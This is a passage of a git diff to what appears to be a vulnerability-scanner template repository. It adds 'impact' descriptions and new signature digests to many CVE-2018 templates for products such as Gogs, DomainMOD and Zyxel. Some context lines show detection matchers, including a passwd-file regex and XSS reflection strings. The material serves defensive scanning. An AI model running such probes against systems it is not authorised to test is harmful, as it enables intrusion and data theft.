+# digest: 4a0a0047304502204859d97f8c4c05b4634fadcc778e895623b6e67684f5f461228f22d1bff79920022100a9cff990042097e99304e63cf6140b081b0fc70c98137a6135d709e89f2b90cf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-18925.yaml b/http/cves/2018/CVE-2018-18925.yaml
index e45d1f7878..c58c977e81 100644
--- a/http/cves/2018/CVE-2018-18925.yaml
+++ b/http/cves/2018/CVE-2018-18925.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: critical
   description: Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a ".." session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
   remediation: This issue will be fixed by updating to the latest version of Gogs.
   reference:
     - https://www.anquanke.com/post/id/163575
@@ -40,4 +42,4 @@ http:
       - type: dsl
         dsl:
           - 'status_code_1 == 500 && status_code_2 == 200 && contains(body_2, "<meta name=\"author\" content=\"Gogs\" />")'
-# digest: 4a0a00473045022017ccf157b9ab2896aaa03de0833881a381e2a09b77053cb3219070002bdd81ad022100df6574b0b987f2c32e9fcba515340a46ec3bef05f872f2efe59480b6f38086a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009ef7dc8eabdf502adf2ea8bdc74e38ce2cd66868b181fc88754dafb02c670a6c022100bcafbd1d57bce06f3364805d946d141756fe0802f24b53ba677efd1a0342330f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19136.yaml b/http/cves/2018/CVE-2018-19136.yaml
index 0463ca7686..d34619082b 100644
--- a/http/cves/2018/CVE-2018-19136.yaml
+++ b/http/cves/2018/CVE-2018-19136.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     DomainMOD 4.11.01 is vulnerable to reflected cross-site scripting via assets/edit/registrar-account.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502204177e8926c3bdc58889bf1284f2c455976e462eda023a06c7e745ac99b28714a022100acf1d952072ae67c4d56564dd4d3e98627c72c74df5fa6cb2b595bb81ace2d22:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204f301c5246853945eff93923827a60e52611a9a78c79c15becacc65b6db21236022100e55ba57fa82b3b890a0c9c7529f05d392d4515b0625a29d54d45780eda751be7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19137.yaml b/http/cves/2018/CVE-2018-19137.yaml
index 07a671d189..ffa618c0f6 100644
--- a/http/cves/2018/CVE-2018-19137.yaml
+++ b/http/cves/2018/CVE-2018-19137.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ba2e01eccc37b26d8a81156d4c898d8fe4fdf4c49ac0c5554310d47ee27f541e022033f6e3ebfe2b629d93f879f598f849ba9095affd6db417a436676003101455e0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b8b80cb827acebd82aec44a1c08b36097619340bc65fa829c2bf196de3d68d45022100eb79c2f34fc72750506bec357c368393d4e667db54cc2aff120a70574b665aac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19287.yaml b/http/cves/2018/CVE-2018-19287.yaml
index c5c17b3076..7df56138dc 100644
--- a/http/cves/2018/CVE-2018-19287.yaml
+++ b/http/cves/2018/CVE-2018-19287.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress Ninja Forms plugin before 3.3.18 contains a cross-site scripting vulnerability. An attacker can inject arbitrary script in includes/Admin/Menus/Submissions.php via the begin_date, end_date, or form_id parameters. This can allow an attacker to steal cookie-based authentication credentials and launch other attacks.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
   remediation: |
     Upgrade to the latest version of the Ninja Forms plugin (3.3.18 or higher) to mitigate this vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ba026d5bb06f15877023a164ba03d42ab7440fba85ada6cf144951973f027dc1022012a4ac9bf223d8aa0817516a4e731f6f415f56c6a42027c65ad5977aa6969be6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100b411059e8363c4a572600337f21146dd39cf5e140c8f72678cdd4ba2f168bcd6022100a92ec95a257ad9b13106e84ff3d553b2cf2f559670c8504b72fb8a8a159119e1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19326.yaml b/http/cves/2018/CVE-2018-19326.yaml
index d750b31825..d188573b0f 100644
--- a/http/cves/2018/CVE-2018-19326.yaml
+++ b/http/cves/2018/CVE-2018-19326.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Zyxel VMG1312-B10D 5.13AAXA.8 is susceptible to local file inclusion. A remote unauthenticated attacker can send a specially crafted URL request containing "dot dot" sequences (/../), conduct directory traversal attacks, and view arbitrary files.
+  impact: |
+    Successful exploitation of this vulnerability allows an attacker to read sensitive files on the target system.
   remediation: |
     Apply the latest firmware update provided by Zyxel to fix the Local File Inclusion vulnerability.
   reference:
@@ -46,4 +48,4 @@ http:
         part: body
         regex:
           - "root:.*:0:0:"
-# digest: 4b0a00483046022100a2699401224705f61c319383efad7d21bab4de91bf4366821568811ca7aacbd802210086aac634c2030dbadc36389d42712a87f697a737a4d9c779bbb5c7616b89c2a7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221008ba74a09a2d2f34678a64238aca41057e02cc9b5a1cb10eab316b278cbc540bd02201737606efe00aeeccf0a3889008db0ad4e27a4fcec778a7240c1535af71b7363:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml
index 38b88e263c..4339c7164c 100644
--- a/http/cves/2018/CVE-2018-19365.yaml
+++ b/http/cves/2018/CVE-2018-19365.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: critical
   description: Wowza Streaming Engine 4.7.4.01 allows traversal of the directory structure and retrieval of a file via a remote, specifically crafted HTTP request to the REST API.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or disclosure of sensitive information.
   remediation: |
     Upgrade to the latest version of Wowza Streaming Engine Manager or apply the necessary patches to fix the directory traversal vulnerability.
   reference:
@@ -40,4 +42,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502201d91fc3e46202a91c4f748734c6c5c0b6cba4a0096af86439227aebc5fdbff43022100e111e49ebfcd2aaa9f07e3596e5c990a48b867bc784adeea7f02b0456945ee0c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009d8f2260d6ed961d01036c4cd7023d10bc804d4ac7cc87e2cff9cdf7f6291544022062bb9b5fc97e34b1db32914cc1bd161c75c0eccb428ecc6a3c8937f507cb3893:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml
index 0ae9f0ff3a..48666a5555 100644
--- a/http/cves/2018/CVE-2018-19386.yaml
+++ b/http/cves/2018/CVE-2018-19386.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: medium
   description: SolarWinds Database Performance Analyzer 11.1.457 contains a reflected cross-site scripting vulnerability in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking or defacement of the affected application.
   remediation: |
     Apply the latest patch or upgrade to a non-vulnerable version of SolarWinds Database Performance Analyzer.
   reference:
@@ -39,4 +41,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100a877abd8859f2cdd1860445d1fc59c10745e46aeb006be1a12d0589de734bf5c022044cddec49eb35450067f09d6c886eea2947442460051bf99e3204eac4a63fe5f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502202509b59bc3f7b365cd0a9849aceee35902998c0c68765e4465c9481b25692e84022100cbeec72fc01472a0e85b57b01c001ba0bc90212ac0e03de6304c3a87efb4b000:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml
index 0417ddbc66..d9054d6e9e 100644
--- a/http/cves/2018/CVE-2018-19439.yaml
+++ b/http/cves/2018/CVE-2018-19439.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot,dwisiswant0
   severity: medium
   description: Oracle Secure Global Desktop Administration Console 4.4 contains a reflected cross-site scripting vulnerability in helpwindow.jsp via all parameters, as demonstrated by the sgdadmin/faces/com_sun_web_ui/help/helpwindow.jsp windowTitle parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking or unauthorized actions.
   remediation: Fixed in later versions including 5.4.
   reference:
     - http://packetstormsecurity.com/files/150444/Oracle-Secure-Global-Desktop-Administration-Console-4.4-Cross-Site-Scripting.html
@@ -34,4 +36,4 @@ http:
         part: body
         words:
           - "<script>alert(1337)</script><!--</TITLE>"
-# digest: 4a0a00473045022100a6f112bd925d34e04de2016c52b4350950cd6ac93c2f55018469310497cbcac20220541bd7f8809bbe94c99aa904538aac3296581c4a59d0da93f7f25366d675a851:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100de57ebb345cebf2fcbd5997146867b8e395c9b9b27783ed9f2ee22edfedb78460220059b544baaecbb65bd6a56e105122a6c35e1f254c43c85ad9619dec9f6cbd799:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19458.yaml b/http/cves/2018/CVE-2018-19458.yaml
index 04b551ad51..d82dffc40e 100644
--- a/http/cves/2018/CVE-2018-19458.yaml
+++ b/http/cves/2018/CVE-2018-19458.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     PHP Proxy 3.0.3 is susceptible to local file inclusion vulnerabilities that allow unauthenticated users to read files from the server via index.php?q=file:/// (a different vulnerability than CVE-2018-19246).
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, remote code execution, and potential compromise of the affected system.
   remediation: |
     Upgrade PHP Proxy to a version that is not affected by the vulnerability (3.0.4 or later) or apply the necessary patches provided by the vendor.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100834cb8dba7fbd5ee91528cab4c159330af0d9bb6b4169871c1e67933cd5769dc022100a36cc32f34d0c1fb60a0db73bbf76218aa764ce7cecd09d4094f0f9f300bde31:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402204850fafe8e83b224a5443a54662b97a99be6271aa10f487fac99b78eaea4a74902206ca87923fc0ef8c7ab8df0cd20b9799ee44f4c9920fcdc1292beac2244807907:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19749.yaml b/http/cves/2018/CVE-2018-19749.yaml
index 293b160d6e..14719b1d6f 100644
--- a/http/cves/2018/CVE-2018-19749.yaml
+++ b/http/cves/2018/CVE-2018-19749.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/account-owner.php Owner name field.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
           - 'contains(header_3, "text/html")'
           - "contains(body_3, '><script>alert(document.domain)</script></a>')"
         condition: and
-# digest: 4a0a00473045022100aec495739f56cf7dd14a81331d9dd9a26a7fb408288ac04583f51510d4168b1a0220796ef9b41b88842a2bb0c6050e2e335a145076acc38cada33ff8e9ec496b3db4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a004630440220745e0ee624e0d2da8bc1e5ecc42fcb3aede188d1d1b542f20d2a906ca204cd9b022041111e08a674b2f4b146de8b1a6b5125b1c9930224a775db2120617d1c32dc2c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19751.yaml b/http/cves/2018/CVE-2018-19751.yaml
index 9c3e0aad86..5ed8834f31 100644
--- a/http/cves/2018/CVE-2018-19751.yaml
+++ b/http/cves/2018/CVE-2018-19751.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /admin/ssl-fields/add.php Display Name, Description & Notes field parameters.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100bc7710bbec7b1d817cf11f3b0d454630fb5e9b2e7c367d6f0be1360832f7c8dd022000b746bcd6bbc28a15caf36cad2dd9c70d774080819b691a0d5c4c01254784cd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402207606e631e8854e80f06478ad8bab762538a6824f9010a13bef2e45a609058626022007bb8b60b0b030f7373892e55cc5a9e4cf233a891c54270ccbd5ea133d2badc1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19752.yaml b/http/cves/2018/CVE-2018-19752.yaml
index fd2a7f9f12..b5226e33cc 100644
--- a/http/cves/2018/CVE-2018-19752.yaml
+++ b/http/cves/2018/CVE-2018-19752.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     DomainMOD through 4.11.01 contains a cross-site scripting vulnerability via the assets/add/registrar.php notes field for Registrar.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502200e1b8f04c3636496ade9fc13b105f903326d108fce1f03d14cf15b5b0509bb61022100bdea15d589d9329da6a74c2e6d295ebe6017ab927df12801cc1930e3c43b9a6a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100c7deb3f1d429fe17264af2dc45f538275d26f254d8e0b14a12d92aadf4c267f902201b6a54f803995e45a863fc70b26b63cb5f2ae1a751062b48d1aa6e57fdfb81bd:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19753.yaml b/http/cves/2018/CVE-2018-19753.yaml
index 2b2ea36a92..3e830716a2 100644
--- a/http/cves/2018/CVE-2018-19753.yaml
+++ b/http/cves/2018/CVE-2018-19753.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Tarantella Enterprise versions prior to 3.11 are susceptible to local file inclusion.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the target system.
   remediation: |
     Upgrade Tarantella Enterprise to version 3.11 or higher to mitigate this vulnerability.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502206cc822dfd7b3516ff443943b7545b2024e6cb36f4e8d5f4c821e4c89ef24b661022100fd76015a22ff722ff377145f93e7a8d3a8d5b373d6025f6eac0a50170cfc9a1a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201a2078149b97ef304d95ae9c8b5afb30cf9fe0122011b53a0f65455cea14f8010221008b3d1dace4ce05b050df3f135a09d149238b15041c665a4062f5a8e1287c4fe0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19877.yaml b/http/cves/2018/CVE-2018-19877.yaml
index 4708e6d262..d968d063f0 100644
--- a/http/cves/2018/CVE-2018-19877.yaml
+++ b/http/cves/2018/CVE-2018-19877.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Adiscon LogAnalyzer before 4.1.7 contains a cross-site scripting vulnerability in the 'referer' parameter of the login.php file.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade Adiscon LogAnalyzer to version 4.1.7 or later to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a0047304502207dd4a0e79c1de3ad4cc1a704c7345ae2f66fcd4f261e857e01308ab4a0bc807f022100b39105b8605762dfc16da8e32e3599c723323ecb653c4c50a1c96f2acd22ab32:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100c62ca9694e169d1bda3f143159c3ababa1a63a06f4498aa09429b1a7bba891b502210099a1f6f5cf2f5d3c741ae3871e2d97515bf54cd2139db21348c52c63ef6a7bf8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19892.yaml b/http/cves/2018/CVE-2018-19892.yaml
index 8bf5290248..8a28d837a1 100644
--- a/http/cves/2018/CVE-2018-19892.yaml
+++ b/http/cves/2018/CVE-2018-19892.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     DomainMOD 4.11.01 contains a cross-site scripting vulnerability via /domain//admin/dw/add-server.php DisplayName parameters.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d170bd15df09daff942367a6eaaeb5c1a9b5c4d282ac9f04b526c21872062fee022052af89cdc00c71cadd5c23d9cfe24e7c63fbd05a23176da4da9745e6c7bec4fe:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100d30133d64abfc09341c83729cb1b0d288ca7ac799f6166f6eb255b6dd1fee8c30220069fb8db38807e776391588e8b97710169acac8261a67c658a29b6685eb3c271:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19914.yaml b/http/cves/2018/CVE-2018-19914.yaml
index 4c6567c7e5..3eaccfcd7d 100644
--- a/http/cves/2018/CVE-2018-19914.yaml
+++ b/http/cves/2018/CVE-2018-19914.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     DomainMOD 4.11.01 contains a cross-site scripting vulnerability via assets/add/dns.php Profile Name or notes field.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of DomainMOD or apply the necessary patches to fix the XSS vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
           - 'contains(header_3, "text/html")'
           - 'contains(body_3, "><script>alert(document.domain)</script></a>")'
         condition: and
-# digest: 490a0046304402202c687b4a2b0b37ff007b3141e4b550989c11d93971e74977a3abe5ca3d07c3bc0220307f25f816ccc87fa4ba1dff0413f0b8336c609994ee6fcaa4ff6e9374c41b45:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203326334363703814d4043641a9e13bed7f225dc07af9020c87c437d32073d8d4022100999298343a2b8fb2da28abc0a00e12e8b85aac32321c45674ad4730a4ebac7c6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-19915.yaml b/http/cves/2018/CVE-2018-19915.yaml
index 69cd78feab..b0dbc9ab39 100644
--- a/http/cves/2018/CVE-2018-19915.yaml
+++ b/http/cves/2018/CVE-2018-19915.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the assets/edit/host.php Web Host Name or Web Host URL field.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of DomainMOD (>=4.11.02) to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
           - 'contains(header_3, "text/html")'
           - 'contains(body_3, "><script>alert(document.domain)</script></a>")'
         condition: and
-# digest: 490a0046304402205aa48d7cf6155ff227fd24447ba8b2cf68d70f837b12cd8019e72570ef3d41cf02204fd4979f0ddd653e0c76a9f4821507affb9090b28795851cb62d8365e71dd38f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100cec9a2c20c0a08a1d43797ab624d04e349c0f260d026707fe3fef589605b5b3a0220743dafe17b413ea16ff5907a8e2ce8183de1e76473b1c4ca454e2bcf09f1e993:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-20009.yaml b/http/cves/2018/CVE-2018-20009.yaml
index db7d18244f..8718eab82a 100644
--- a/http/cves/2018/CVE-2018-20009.yaml
+++ b/http/cves/2018/CVE-2018-20009.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider.php ssl-provider-name and ssl-provider's-url parameters.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
           - 'contains(header_3, "text/html")'
           - 'contains(body_3, "><script>alert(document.domain)</script></a>")'
         condition: and
-# digest: 490a004630440220613c01fd168413cf2882475342c9c85cd47aea1e2c496170728ed0f5c446ad62022051349677f5d567afaf36e901091b38bb4901e56253f5eef9835a0a7fed49744d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502207d44fc1d0aba99d0070cb03dd7045e10c966e03cfcf43fd2a660d68c82362dd8022100a2fc78357b31179e2c117404755a2d3a57542074a580857dc6c22fa70c20e1f8:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-20010.yaml b/http/cves/2018/CVE-2018-20010.yaml
index 4fb2056fbc..6dc7823d93 100644
--- a/http/cves/2018/CVE-2018-20010.yaml
+++ b/http/cves/2018/CVE-2018-20010.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/ssl-provider-account.php Username field.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
           - 'contains(header_3, "text/html")'
           - 'contains(body_3, "><script>alert(document.domain)</script></a>")'
         condition: and
-# digest: 4b0a004830460221009fd32d65e2f6eb43bf017b4a162721f67d9e4bed04ecc13597a4d7bcd238833802210093853d9b51deca0adc7c7255f4dc10ec77bb73c4e4c2a64ab5b32b60860acadf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a361e2269262f35c691bea6ef3c8436347e56c4fc419fc800e7be175221c5f28022100ba64eea3cb8db6fbc4f40332075fc490a24d0759e62d34f7e91999f5dfda3978:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-20011.yaml b/http/cves/2018/CVE-2018-20011.yaml
index 316bb4aa6e..5891e64bf8 100644
--- a/http/cves/2018/CVE-2018-20011.yaml
+++ b/http/cves/2018/CVE-2018-20011.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     DomainMOD through version 4.11.01 is vulnerable to cross-site scripting via the /assets/add/category.php CatagoryName and StakeHolder parameters.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade to the latest version of DomainMOD or apply the vendor-provided patch to mitigate this vulnerability.
   reference:
@@ -54,4 +56,4 @@ http:
           - 'contains(header_3, "text/html")'
           - 'contains(body_3, "><script>alert(document.domain)</script></a>")'
         condition: and
-# digest: 490a00463044022060738793bd5aa2508c25d9ead545b78adabd38c9eef8bbb888ea1736a8c535c50220735fb802cd565eca21be793df678dbab5ba8b98a155ad227a872cc1411c10514:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502201b51732261278315bd434a2166c7c314328e0149ce6e8e85dd1a2fb1838a43a5022100bb66f186c9b4cb1b41863431d50f7e8545c379eeda82330805d1205bab6524ea:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-20462.yaml b/http/cves/2018/CVE-2018-20462.yaml
index af5bcbfdd7..00353499c4 100644
--- a/http/cves/2018/CVE-2018-20462.yaml
+++ b/http/cves/2018/CVE-2018-20462.yaml
@@ -5,6 +5,8 @@ info:
   author: daffainfo
   severity: medium
   description: WordPress JSmol2WP version 1.07 and earlier is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via the jsmol.php data parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Update to the latest version of the WordPress JSmol2WP plugin (1.08 or higher) to mitigate this vulnerability.
   reference:
@@ -47,4 +49,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100d2ca4e3edc14381a9caa4b32b02848dc8a84a50338a18d5e5040a51dbed335c10220167a234c113a9bdef5e7632ded047b927332e054d0e9155772630755cd3f84ce:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022053d2dcbf8efdc14a42b061fa19ca8e9bbf5701e946a08c01418092d70d58a66e022100b625a488fe5ef48d4c4c0086f8cd2d2e0df50005343eafff6fdf17d592a370d5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-20463.yaml b/http/cves/2018/CVE-2018-20463.yaml
index 52c3e88eb8..60ae3b146e 100644
--- a/http/cves/2018/CVE-2018-20463.yaml
+++ b/http/cves/2018/CVE-2018-20463.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     WordPress JSmol2WP plugin 1.07 is susceptible to local file inclusion via ../ directory traversal in query=php://filter/resource= in the jsmol.php query string. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. This can also be exploited for server-side request forgery.
+  impact: |
+    An attacker can exploit this vulnerability to read sensitive files on the server, potentially leading to unauthorized access or information disclosure.
   remediation: |
     Update to the latest version of the JSmol2WP plugin (>=1.08) or remove the plugin if it is not necessary.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100f9f4e6e3e0dbeb3398f38f77f4934117edce19b5e4b6ab312b69a82a7026aac7022005f67c2ccc1ca524b80a1651fd0ea9c354806dd5fb19b5c179993419666a69ca:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100916a9792a63d39c0d4eba0a95557402d548cce5a6c1533974af0c64a8b26dcd802207105a7c6688904e17f112495653f219f7b3503d9bf365017a7029726accf3646:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2018/CVE-2018-20470.yaml b/http/cves/2018/CVE-2018-20470.yaml
index 16f5003966..be286753d9 100644
--- a/http/cves/2018/CVE-2018-20470.yaml
+++ b/http/cves/2018/CVE-2018-20470.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Tyto Sahi Pro versions through 7.x.x and 8.0.0 are susceptible to a local file inclusion vulnerability in the web reports module which can allow an outside attacker to view contents of sensitive files.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the server.
   remediation: |
